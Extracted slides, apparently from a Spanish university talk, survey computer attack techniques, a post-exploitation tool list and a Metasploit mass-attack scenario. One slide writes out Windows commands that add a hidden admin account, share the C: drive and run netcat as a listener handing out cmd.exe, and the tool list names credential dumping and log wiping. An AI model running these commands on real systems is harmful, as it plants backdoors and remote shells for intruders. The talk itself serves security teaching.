Este documento presenta una agenda sobre técnicas de ataque en seguridad informática. Explica la diferencia entre hackers y crackers, así como las principales técnicas de ataque como wardriving, wardialing, cracking e ingeniería social. También describe vectores de ataque a una red, herramientas de caja de herramientas de ataque, y muestra un ejemplo de ataque masivo usando Metasploit. Por último, analiza las conclusiones sobre la seguridad informática actual y las amenazas a sistemas.
1. TÉCNICAS DE ATAQUE EN
SEGURIDAD INFORMÁTICA
Grupo de I+D en Tecnologías de la
Información (GTI)
(Esp) Siler Amador Donado
samador@unicauca.edu.co
http://gseguridad.unicauca.edu.co
2. AGENDA
Hackers vs Crackers
El riesgo en la seguridad informática
Pérdidas económicas por ataques informáticos
Técnicas de ataque
Vectores de ataque a una red
Y si tienen la oportunidad…
Caja de herramientas de ataque
La próxima generación de Troyanos Keylogers
Demo (Ataque Masivo)
… Y en la Unicauca que?
Conclusiones
7. TECNICAS DE ATAQUE
Wardriving: Nombre que recibe la búsqueda de redes
inalámbricas para documentar su posición. Para realizar esta
búsqueda se necesita como mínimo un equipo móvil (portátil) con
tarjeta Wireless, y si queremos que la posición sea precisa, un GPS
para pasar los datos a un mapa.
Objetivo: Conectarse al punto de acceso (AP) mal configurado e
ingresar a la la red local de la empresa.
Herramientas:
NetStumbler
Kismet
http://www.wardrive.net/wardriving/tools
8. TECNICAS DE ATAQUE
Wardialing: Fue una técnica de los 80´s y 90´s, consitía en
marcar repetidamente a modems y PBX´s disponibles en la red y de
esta forma irrumpir a sistemas remotos.
Objetivo: Conectarse a modems o PBX´s mal configurados e
ingresar a la la red local de la empresa.
Herramientas:
THC-Scan 2.0
ModemScan
ShokDial
9. TECNICAS DE ATAQUE
Cracking: Modificar un programa para obtener beneficios.
Normalmente se basa en quitar pantallas introductorias,
protecciones o, como en unas modificaciones de cierto programa de
comunicaciones, conseguir nuevos passwords de acceso a
sistemas.
Objetivo:
Tener acceso al software o a la red interna.
Herramientas:
Las 100 mejores http://sectools.org/
Inyección SQL
XSS
10. TECNICAS DE ATAQUE
Ing. Social: Persuadir a otra persona (a través de diversas
formas) para que nos de un dato útil para cumplir un objetivo. Este
dato puede ser un password, un código, etc. incluso pueden dar
nombres de familiares y fechas importantes, que siempre se usan
para formar claves.
Objetivo: Obtener información sensible que nos permita el
acceso a la red.
Herramientas:
Teléfono
Mucha psicología
Inteligencia emocional
http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
11. VECTORES DE ATAQUE A UNA RED
Puntos de acceso
INTERNET
MODEM
WIRELESS
FISICO
RED
Wardriving
Ing. Social
Wardialing
Cracking
12. Y si tienen la oportunidad…
Menos de 1 minuto es suficiente para:
1. Crear una cuenta con privilegios de Admin!!!
1. Abrir la consola de comandos
2. C:net user fusm2010 fusm2010 /add
3. C:net localgroup administradores fusm2010 /add
2. Compartir toda la unidad del disco!!!
1. C:net share fusm2010=c: /remark:”Demo fusm2010”
3. Colocar un programa en escucha!!!
1. http://gseguridad.unicauca.edu.co/nc.exe
2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
13. Caja de Herramientas de ataque en
línea de comandos
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server
Agradecimientos a: Netranger
Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
14. LA PRÓXIMA GENERACION DE
TROYANOS KEYLOGERS…
http://www.hispasec.com/laboratorio/troyano_video.htm
VIDEO
15. EJEMPLO DE ATAQUE MASIVO
Escenario
INTERNET LAN
ATACANTE MAESTRO
ZOMBIES
Linux/Windows
Metasploit
Scripts en Python
Linux-BackTrack4
Win/XP/2K
http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
16. ... Y en la Unicauca que?
• Electiva de seguridad informática
• Área de interés en seguridad informática del GTI. (Proyectos de tesis
de grado)
• Legislación en comercio electrónico (Finalizado)
• OBSES (Firewall Cluster Beowulf) (Finalizado)
• INFORCE (Finalizado)
• Antivirus-inteligente (En desarrollo)
• Estudio de las tendencias predictivas sobre la escogencia de
contraseñas basado en redes bayesianas (Finalizado)
• Proyecto SGSI en UNICAUCA (En desarrollo)
• Publicaciones
Preocupación del departamento de sistemas de la FIET sobre la
problemática de la seguridad de la información en Colombia.
17. CONCLUSIONES
Los ataques de seguridad informática a nivel mundial son
aislados? Inversión en guerra informática? ECHELON,
ENFOPOL, CARNÍVORO…
• USA
• UK
• CHINA
• RUSIA
Los sistemas de seguridad actuales son reactivos y correctivos.
• Preventivos
• Inteligentes
Existen demasiadas herramientas de ataque gratis y
disponibles en la red.
Las técnicas de ataque cambian constantemente.
Segun las estadísticas es muy probable que su sistema
haya sido vulnerado y usted aún no lo sepa!!!.